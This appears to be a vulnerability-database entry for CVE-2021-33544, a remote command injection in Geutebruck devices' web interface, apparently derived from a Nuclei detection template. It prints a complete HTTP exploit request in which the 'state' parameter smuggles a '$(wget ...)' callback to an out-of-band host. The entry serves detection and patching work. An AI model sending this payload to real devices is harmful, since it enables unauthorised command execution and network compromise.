🔙 목록으로 돌아가기

CVE-2021-33544: Geutebruck - Remote Command Injection

TitleGeutebruck - Remote Command Injection
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.
RemediationApply the latest security patches or firmware updates provided by Geutebruck to mitigate the vulnerability.
CVSS Score7.2
EPSS Score0.94247
CVE IDCVE-2021-33544
CWE IDCWE-78
Tags cve2021 cve geutebruck rce oast geutebrueck vkev vuln

🔍 Vulnerability Description

Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://d5jns5hle0o4647gp7ogiahiujwhkcoc9.oast.pro)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33544.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-33544.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A